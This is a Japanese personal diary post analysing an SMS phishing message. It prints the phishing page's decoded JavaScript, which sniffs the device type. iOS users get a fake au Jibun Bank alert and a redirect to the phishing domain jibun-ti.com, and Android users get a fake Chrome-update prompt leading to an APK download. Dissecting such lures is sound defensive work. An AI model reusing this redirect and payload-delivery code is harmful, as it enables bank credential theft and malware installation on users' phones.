パスワードを忘れた? アカウント作成
14228535 journal
日記

nnnhhhの日記: SMSでフィッシングが来た

日記 by nnnhhh

初めてだわ
電話場号は自称 070-2622-9185

接続先は難読化したJavaScrtptなので解読してみる

var vHtMxCbOiOoAeJoTnCfNnNjQfLfQwIyCwOfUlRwLcHmTyWqWeEzGtMxBrSzDoJoGrLnQvAsKyQx = {
        versions: function () {
                var pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO = navigator.userAgent, app = navigator.appVersion;
                return {
                        trident: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('Trident') > -1,
                        presto: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('Presto') > -1,
                        webKit: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('AppleWebKit') > -1,
                        gecko: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('Gecko') > -1 && pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('KHTML') == -1,
                        mobile: !!pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.match(/AppleWebKit.*Mobile.*/),
                        ios: !!pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
                        android: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('Android') > -1 || pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('Linux') > -1,
                        iPhone: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('iPhone') > -1,
                        iPad: pZyYjCnLnOcZeQuMbRrCdTgTpOpZlSdDtGgQrNaSpWnKuGxAtSfZvPvIyQrPdIwCeVaNyYtDiFmVtKiO.indexOf('iPad') > -1,
                };
        }(),
        language: (navigator.browserLanguage || navigator.language).toLowerCase()
};

if (vHtMxCbOiOoAeJoTnCfNnNjQfLfQwIyCwOfUlRwLcHmTyWqWeEzGtMxBrSzDoJoGrLnQvAsKyQx.versions.ios || vHtMxCbOiOoAeJoTnCfNnNjQfLfQwIyCwOfUlRwLcHmTyWqWeEzGtMxBrSzDoJoGrLnQvAsKyQx.versions.iPhone || vHtMxCbOiOoAeJoTnCfNnNjQfLfQwIyCwOfUlRwLcHmTyWqWeEzGtMxBrSzDoJoGrLnQvAsKyQx.versions.iPad) {
        window.alert("【JIBUNBK】お客様がご利用のauじぶん銀行銀行に対し、第三者からの不正なアクセスを検知しました。必ず更新手続きをお願いします。");
        window.location.href='http://jibun-ti.com'
} else if (vHtMxCbOiOoAeJoTnCfNnNjQfLfQwIyCwOfUlRwLcHmTyWqWeEzGtMxBrSzDoJoGrLnQvAsKyQx.versions.android) {
        window.alert("セキュリティ向上のため,最新バージョンのChromeにアップデートしてください.");
        window.location.href = "zUgEtKbVkPiPbDqNbDdD.apk";

} else {

}

へー、こんなになってんのね、って感じ
jibun-ti.com にアクセスしようとしたらChromeやらセキュリティソフトやらに止められるw
結局AUじぶん銀行の偽ページでした
広告も貼ってあるけど、javascript:void(0) とかの微妙なリンクになってるのもいとおかし

typodupeerror

犯人はmoriwaka -- Anonymous Coward

読み込み中...